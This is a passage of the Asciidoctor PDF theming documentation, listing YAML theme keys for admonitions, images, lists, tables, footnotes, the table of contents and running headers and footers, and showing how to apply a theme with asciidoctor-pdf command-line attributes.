>>^[2]^\n\n|name\n|<icon set>-<icon name>^[3]^ +\n(default: _not set_)\n|admonition:\n icon:\n tip:\n name: fas-fire\n\n|stroke-color\n|<<colors,Color>> +\n(default: caution=#bf3400; important=#bf0000; note=#19407c; tip=#111111; warning=#bf6900)\n|admonition:\n icon:\n important:\n stroke-color: ff0000\n\n|size\n|<<values,Number>> +\n(default: 24)\n|admonition:\n icon:\n note:\n size: 24\n|===\n\n. The top and bottom padding values are ignored on admonition-label-padding.\n. `<name>` can be `note`, `tip`, `warning`, `important`, or `caution`.\nThe subkeys in the icon category cannot be flattened (e.g., `tip-name: far-lightbulb` is not valid syntax).\n. Required.\nSee the `.yml` files in the https:\/\/github.com\/jessedoyle\/prawn-icon\/tree\/master\/data\/fonts[prawn-icon repository] for a list of valid icon names.\nThe prefix (e.g., `fas-`) determines which font set to use.\n\n[#keys-image]\n=== Image\n\nThe keys in this category control the arrangement of block images.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-image,image>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: left)\n|image:\n align: left\n\n|width^[1]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|image:\n width: 100%\n|===\n\n. Only applies to block images.\nIf specified, this value takes precedence over the value of the `width` attribute on the image macro, but not over the value of the `pdfwidth` attribute.\n\n[#keys-svg]\n=== SVG\n\nThe keys in this category control the SVG integration.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-svg,svg>>\n\n|fallback_font_family^[1]^\n|<<fonts,Font family name>> +\n(default: $base-font-family)\n|svg:\n fallback_font_family: Times-Roman\n|===\n. The fallback font family is only used when the font family in the SVG does not map to a known font name from the font catalog.\n\n[#keys-lead]\n=== Lead\n\nThe keys in this category control the styling of lead paragraphs.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-lead]*Key Prefix:* <<key-prefix-lead,lead>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|lead:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|lead:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: 13.5)\n|lead:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|lead:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|lead:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.4)\n|lead:\n line-height: 1.4\n|===\n\n[#keys-abstract]\n=== Abstract\n\nThe keys in this category control the arrangement and style of the abstract.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-abstract]*Key Prefix:* <<key-prefix-abstract,abstract>>\n\n|font-color\n|<<colors,Color>> +\n(default: $base-font-color)\n|abstract:\n font-color: #5c6266\n\n|font-size\n|<<values,Number>> +\n(default: 13.5)\n|abstract:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $base-font-style)\n|abstract:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $base-text-transform)\n|abstract:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.4)\n|abstract:\n line-height: 1.4\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|abstract:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-abstract-title]*Key Prefix:* <<key-prefix-abstract-title,abstract-title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|abstract:\n title:\n align: center\n\n|font-color\n|<<colors,Color>> +\n(default: $base-font-color)\n|abstract:\n title:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $base-font-family)\n|abstract:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $base-font-size)\n|abstract:\n title:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|abstract:\n title:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $base-text-transform)\n|abstract:\n title:\n text-transform: uppercase\n|===\n\n[#keys-thematic-break]\n=== Thematic Break\n\nThe keys in this category control the style of thematic breaks (aka horizontal rules).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-thematic-break]*Key Prefix:* <<key-prefix-thematic-break,thematic-break>>\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|thematic-break:\n border-color: #eeeeee\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|thematic-break:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: 0.5)\n|thematic-break:\n border-width: 0.5\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|thematic-break:\n margin-top: 6\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: $vertical-spacing)\n|thematic-break:\n margin-bottom: 18\n|===\n\n[#keys-description-list]\n=== Description List\n\nThe keys in this category control the arrangement and style of definition list items (terms and descriptions).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-description-list]*Key Prefix:* <<key-prefix-description-list,description-list>>\n\n|term-font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|description-list:\n term-font-style: italic\n\n|term-spacing\n|<<measurement-units,Measurement>> +\n(default: 4)\n|description-list:\n term-spacing: 5\n\n|description-indent\n|<<values,Number>> +\n(default: 30)\n|description-list:\n description-indent: 15\n|===\n\n[#keys-outline-list]\n=== Outline List\n\nThe keys in this category control the arrangement and style of outline list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-outline-list]*Key Prefix:* <<key-prefix-outline-list,outline-list>>\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 30)\n|outline-list:\n indent: 40\n\n|item-spacing\n|<<measurement-units,Measurement>> +\n(default: 6)\n|outline-list:\n item-spacing: 4\n\n|marker-font-color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|outline-list:\n marker-font-color: #3c763d\n\n|text-align^[2]^\n|<<text-alignments,Text alignment>> +\n(default: $base-align)\n|outline-list:\n text-align: left\n|===\n\n. Controls the color of the bullet glyph that marks items in unordered lists and the number for items in ordered lists.\n. Controls the alignment of the list text only, not nested content (blocks or lists).\n\n[#keys-ulist]\n=== Unordered List\n\nThe keys in this category control the arrangement and style of unordered list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-ulist-marker]*Key Prefix:* <<key-prefix-ulist-marker,ulist-marker>>\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: $outline-list-marker-font-color)\n|ulist:\n marker:\n font-color: #cccccc\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|ulist:\n marker:\n line-height: 1.5\n|===\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|*Key Prefix:* ulist-marker-<type>^[1]^\n\n|content\n|<<quoted-string,Quoted string>>\n|ulist:\n marker:\n disc:\n content: \"\\uf140\"\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-family: fas\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font-color: #ff0000\n\n|line-height\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n line-height: 2\n|===\n\n. <type> is one of disc, square, circle, checked, unchecked\n\n[#keys-table]\n=== Table\n\nThe keys in this category control the arrangement and style of tables and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-table]*Key Prefix:* <<key-prefix-table,table>>\n\n|background-color\n|<<colors,Color>> +\n(default: transparent)\n|table:\n background-color: #ffffff\n\n|border-color\n|<<colors,Color>> +\n(default: #000000)\n|table:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n border-style: solid\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|table:\n border-width: 0.5\n\n|caption-side\n|top {vbar} bottom +\n(default: top)\n|table:\n caption-side: bottom\n\n|caption-max-width\n|fit-content {vbar} none +\n(default: fit-content)\n|table:\n caption-max-width: none\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|table:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|table:\n font-family: Helvetica\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|table:\n font-size: 9.5\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|table:\n font-style: italic\n\n|grid-color\n|<<colors,Color>> +\n(default: $table-border-color)\n|table:\n grid-color: #eeeeee\n\n|grid-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n grid-style: dashed\n\n|grid-width\n|<<values,Number>> +\n(default: $table-border-width)\n|table:\n grid-width: 0.5\n\n3+|[#key-prefix-table-head]*Key Prefix:* <<key-prefix-table-head,table-head>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: _inherit_)\n\/\/|table:\n\/\/ head:\n\/\/ align: center\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n head:\n background-color: #f0f0f0\n\n|border-bottom-color\n|<<colors,Color>> +\n(default: $table-border-color)\n|table:\n head:\n border-bottom-color: #dddddd\n\n|border-bottom-style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n head:\n border-bottom-style: dashed\n\n|border-bottom-width\n|<<values,Number>> +\n(default: 1.25)\n|table:\n head:\n border-bottom-width: 1\n\n|font-color\n|<<colors,Color>> +\n(default: $table-font-color)\n|table:\n head:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-font-family)\n|table:\n head:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $table-font-size)\n|table:\n head:\n font-size: 10\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|table:\n head:\n font-style: normal\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|table:\n head:\n text-transform: uppercase\n\n3+|[#key-prefix-table-body]*Key Prefix:* <<key-prefix-table-body,table-body>>\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n body:\n background-color: #fdfdfd\n\n|stripe-background-color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|table:\n body:\n stripe-background-color: #efefef\n\n3+|[#key-prefix-table-foot]*Key Prefix:* <<key-prefix-table-foot,table-foot>>\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n foot:\n background-color: #f0f0f0\n\n|font-color\n|<<colors,Color>> +\n(default: $table-font-color)\n|table:\n foot:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-font-family)\n|table:\n foot:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $table-font-size)\n|table:\n foot:\n font-size: 10\n\n|font-style\n|<<font-styles,Font style>> +\n(default: normal)\n|table:\n foot:\n font-style: italic\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-table-cell,table-cell>>\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 2)\n|table:\n cell:\n padding: 3\n\n3+|[#key-prefix-table-header-cell]*Key Prefix:* <<key-prefix-table-header-cell,table-header-cell>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: $table-head-align)\n\/\/|table:\n\/\/ header-cell:\n\/\/ align: center\n\n|background-color\n|<<colors,Color>> +\n(default: $table-head-background-color)\n|table:\n header-cell:\n background-color: #f0f0f0\n\n|font-color\n|<<colors,Color>> +\n(default: $table-head-font-color)\n|table:\n header-cell:\n font-color: #1a1a1a\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-head-font-family)\n|table:\n header-cell:\n font-family: Noto Sans\n\n|font-size\n|<<values,Number>> +\n(default: $table-head-font-size)\n|table:\n header-cell:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $table-head-font-style)\n|table:\n header-cell:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $table-head-text-transform)\n|table:\n header-cell:\n text-transform: uppercase\n|===\n. This key only controls the color that is used for stripes.\nThe appearance of stripes is controlled using the `stripes` table attribute, the `table-stripes` document attribute (since Asciidoctor 2), or the `stripes` document attribute (prior to Asciidoctor 2).\nPermitted attribute values are even, odd, all, and none.\nPrior to Asciidoctor 2, even rows are shaded by default (e.g., `stripes=even`).\nSince Asciidoctor 2, table stripes are not enabled by default (e.g., `stripes=none`).\n\n[#keys-footnotes]\n=== Footnotes\n\nThe keys in this catagory control the style the list of footnotes at the end of the chapter (book) or document (otherwise).\nIf the `footnotes-title` attribute is specified, it is styled as a block caption.\nThe styling of the links is controlled by the global link styles.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-footnotes]*Key Prefix:* <<key-prefix-footnotes,footnotes>>\n\n|font-color\n|<<colors,Color>> +\n(default: $base-font-color)\n|footnotes:\n font-color: #cccccc\n\n|font-size\n|<<values,Number>> +\n(default: 9)\n|footnotes:\n font-size: 8\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $base-font-style)\n|footnotes:\n font-style: italic\n\n|item-spacing\n|<<measurement-units,Measurement>> +\n(default: 3)\n|footnotes:\n item-spacing: 5\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|footnotes:\n margin-top: 10\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|footnotes:\n text-transform: lowercase\n|===\n\n[#keys-table-of-contents]\n=== Table of Contents (TOC)\n\nThe keys in this category control the arrangement and style of the table of contents.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-toc]*Key Prefix:* <<key-prefix-toc,toc>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n\/\/ QUESTION why is the default not inherited?\n(default: normal)\n|toc:\n font-style: bold\n\n|text-decoration\n|none {vbar} underline +\n(default: none)\n|toc:\n text-decoration: underline\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.4)\n|toc:\n line-height: 1.5\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 15)\n|toc:\n indent: 20\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|toc:\n margin-top: 0\n\n3+|[#key-prefix-toc-level]*Key Prefix:* <<key-prefix-toc-level,toc-h<n> >>^[1]^\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n h3-font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|toc:\n font-style: italic\n\n|text-decoration\n|none {vbar} underline +\n(default: _inherit_)\n|toc:\n text-decoration: none\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text-transform: uppercase\n\n3+|[#key-prefix-toc-title]*Key Prefix:* <<key-prefix-toc-title,toc-title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading-h2-align)\n|toc:\n title:\n align: right\n\n|font-color\n|<<colors,Color>> +\n(default: $heading-h2-font-color)\n|toc:\n title:\n font-color: #aa0000\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $heading-h2-font-family)\n|toc:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $heading-h2-font-size)\n|toc:\n title:\n font-size: 18\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $heading-h2-font-style)\n|toc:\n title:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $heading-h2-text-transform)\n|sidebar:\n title:\n text-transform: uppercase\n\n3+|[#key-prefix-toc-dot-leader]*Key Prefix:* <<key-prefix-toc-dot-leader,toc-dot-leader>>\n\n|content\n|<<quoted-string,Quoted string>> +\n(default: '. ')\n|toc:\n dot-leader:\n content: \". \"\n\n|font-color^[2]^\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n dot-leader:\n font-color: #999999\n\n|font-style^[2]^\n|<<font-styles,Font style>> +\n(default: normal)\n|toc:\n dot-leader:\n font-style: bold\n\n|levels^[3]^\n|all {vbar} none {vbar} Integers (space-separated) +\n(default: all)\n|toc:\n dot-leader:\n levels: 2 3\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. The dot leader inherits all font properties except `font-style` from the root `toc` category.\n. 0-based levels (e.g., part = 0, chapter = 1).\nDot leaders are only shown for the specified levels.\nIf value is not specified, dot leaders are shown for all levels.\n\n[#keys-running-content]\n=== Running Content (Header & Footer)\n\nThe keys in this category control the arrangement and style of running header and footer content.\nPlease note that the running content will _not_ be used unless a) the periphery (header or footer) is configured and b) the height key for the periphery is assigned a value.\n\nCAUTION: If the height of the running content periphery is larger than the page margin, the running content will cover the main content.\nTo avoid this problem, reduce the height of the running content periphery or make the page margin on that side larger.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-running-content]*Key Prefix:* <<key-prefix-running-content,running-content>>\n\n|start-at\n|title {vbar} toc {vbar} body +\n(default: body)\n|running-content:\n start-at: toc\n\n3+|[#key-prefix-header]*Key Prefix:* <<key-prefix-header,header>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|header:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: $base-border-width)\n|header:\n border-width: 0.25\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|header:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|header:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|header:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|header:\n font-style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n height: 0.75in\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|header:\n line-height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|header:\n padding: [0, 3, 0, 3]\n\n|image-vertical-align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n image-vertical-align: 4\n\n|sectlevels\n|Integer +\n(default: 2)\n|header:\n sectlevels: 3\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: none)\n|header:\n text-transform: uppercase\n\n|title-style\n|document {vbar} toc {vbar} basic +\n(default: document)\n|header:\n title-style: toc\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|header:\n vertical-align: center\n\n|<side>-columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|header:\n recto:\n columns: <25% =50% >25%\n\n|<side>-<position>-content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|header:\n recto:\n left:\n content: '\\{page-number}'\n\n3+|[#key-prefix-footer]*Key Prefix:* <<key-prefix-footer,footer>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|footer:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: $base-border-width)\n|footer:\n border-width: 0.25\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|footer:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|footer:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|footer:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|footer:\n font-style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n height: 0.75in\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|footer:\n line-height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|footer:\n padding: [0, 3, 0, 3]\n\n|image-vertical-align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n image-vertical-align: 4\n\n|sectlevels\n|Integer +\n(default: 2)\n|footer:\n sectlevels: 3\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: none)\n|footer:\n text-transform: uppercase\n\n|title-style\n|document {vbar} toc {vbar} basic +\n(default: document)\n|footer:\n title-style: toc\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|footer:\n vertical-align: top\n\n|<side>-columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|footer:\n verso:\n columns: <50% =0% <50%\n\n|<side>-<position>-content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|footer:\n verso:\n center:\n content: '\\{page-number}'\n|===\n. The background color spans the width of the page, as does the border when a background color is specified.\n. *If the height is not set, the running content at this periphery is disabled.*\n. If the side padding is negative, the content will bleed into the margin of the page.\n. `<side>` can be `recto` (right-hand, odd-numbered pages) or `verso` (left-hand, even-numbered pages).\nWhere the page sides fall in relation to the physical or printed page number is controlled using the `pdf-folio-placement` attribute (except when `media=prepress`, which implies `physical`).\n. `<position>` can be `left`, `center` or `right`.\n\nIMPORTANT: If you don't specify a height for either the header or footer key, it effectively disables the content at that periphery.\n\nIf you define running header and footer content in your theme (including the height), you can still disable this content per document by setting the `noheader` and `nofooter` attributes in the AsciiDoc document header, respectively.\n\nIf content is not specified for the running footer, the page number (i.e., `\\{page-number}`) is shown on the left on verso pages and the right on recto pages.\nYou can disable this behavior by defining the attribute `nofooter` in the AsciiDoc document header or by defining the key `footer-<side>-content: none` in the theme.\n\nTIP: Although not listed in the table above, you can control the font settings (font-family, font-size, font-color, font-style, text-transform) that get applied to the running content in each column position for each page side (e.g., `footer-<side>-<position>-font-color`).\nFor example, you can set the font color used for the right-hand column on recto pages by setting `footer-recto-right-font-color: 6CC644`.\n\n==== Attribute References\n\nYou can use _any_ attribute defined in your AsciiDoc document (such as `doctitle`) in the content of the running header and footer.\nIn addition, the following attributes are also available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* part-title\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nYou can also built-in AsciiDoc text replacements like `+(C)+`, numeric character references like `+©+` and inline formatting (e.g., bold, italic, monospace).\n\nHere's an example that shows how attributes and replacements can be used in the running footer:\n\n[source,yaml]\n----\nheader:\n height: 0.75in\n line-height: 1\n recto:\n center:\n content: '(C) ACME -- v{revnumber}, {docdate}'\n verso:\n center:\n content: $header-recto-center-content\nfooter:\n height: 0.75in\n line-height: 1\n recto:\n right:\n content: '{section-or-chapter-title} | *{page-number}*'\n verso:\n left:\n content: '*{page-number}* | {chapter-title}'\n----\n\nYou can split the content value across multiple lines using YAML's multiline string syntax.\nIn this case, the single quotes around the string are not necessary.\nTo force a hard line break in the output, add `{sp}+` to the end of the line in normal AsciiDoc fashion.\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n line-height: 1.2\n recto:\n right:\n content: |\n Section Title - Page Number +\n {section-or-chapter-title} - {page-number}\n verso:\n left:\n content: |\n Page Number - Chapter Title +\n {page-number} - {chapter-title}\n----\n\nTIP: You can use most AsciiDoc inline formatting in the values of these keys.\nFor instance, to make the text bold, surround it in asterisks (as shown above).\nOne exception to this rule are inline images, which are described in the next section.\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\nHere's an example of how to use an image in the running header (which also applies for the footer).\n\n[source,yaml,subs=attributes+]\n----\nheader:\n height: 0.75in\n image-vertical-align: 2 {conum-guard-yaml} <1>\n recto:\n center:\n content: image:footer-logo.png[width=80]\n verso:\n center:\n content: $header-recto-center-content\n----\n<1> You can use the `footer-vertical-align` attribute to slighly nudge the image up or down.\n\nCAUTION: By default, the image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the width attribute accordingly using the `pdfwidth` attribute.\nAlternatively, you can set the `fit` attribute to `scale-down` (e.g., `fit=scale-down`) to reduce the image size to fit in the available space or `contain` (i.e., `fit=contain`) to scale the image (up or down) to fit the available space.\n\n== Applying Your Theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-theme (or pdf-style):: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file and is resolved relative to `pdf-themesdir`, if specified, otherwise the current directory.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`) and is resolved relative to `pdf-themesdir`, if specified, otherwise the built-in themes dir.\n\npdf-themesdir (or pdf-stylesdir):: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\nIf `pdf-theme` ends with `.yml`, and `pdf-themesdir` is not specified, then `pdf-themesdir` defaults to the directory of the path specified by `pdf-theme`.\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-themesdir=resources\/themes -a pdf-theme=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-themesdir` attribute and just pass the absolute path of your theme file to the `pdf-theme` attribute.\n\n $ asciidoctor-pdf -a pdf-theme=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommend that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-themesdir=\/path\/to\/resources\/themes -a pdf-theme=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n\nAs usual, you can also use build tools like Maven and Gradle to build a themed PDF.\nThe only thing you need to add to an existing build is the attributes mentioned above.\n\n* https:\/\/github.com\/asciidoctor\/asciidoctor-maven-examples\/tree\/master\/asciidoctor-pdf-with-theme-example[Maven Example]\n* https:\/\/github.com\/asciidoctor\/asciidoctor-gradle-examples\/tree\/master\/asciidoc-to-pdf-with-theme-example[Gradle Example]\n\n== Theme-Related Document Attributes\n\nThere are various settings in the theme you control using document attributes.\nThese settings override equivalent keys defined in the theme file, where applicable.\n\n[cols=\"2,3,6l\"]\n|===\n|Attribute |Value Type |Example\n\n|autofit-option\n|flag (default: _not set_)\n|:autofit-option:\n\n|chapter-label\n|string (default: Chapter)\n|:chapter-label: Chapitre\n\n|<face>-cover-image^[1]^\n|path^[2]^ {vbar} image macro^[3]^ +\n(format can be image or PDF)\n|:front-cover-image: image:front-cover.pdf[]\n\n|media\n|screen {vbar} print {vbar} prepress\n|:media: prepress\n\n|outlinelevels\n|number (default: same as _toclevels_)\n|:outlinelevels: 2\n\n|page-background-image^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image: image:bg.jpg[]\n\n|page-background-image-(recto{vbar}verso)^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image-recto: image:bg-recto.jpg[]\n\n|pagenums^[5]^\n|flag (default: _set_)\n|:pagenums:\n\n|pdf-page-layout\n|portrait {vbar} landscape\n|:pdf-page-layout: 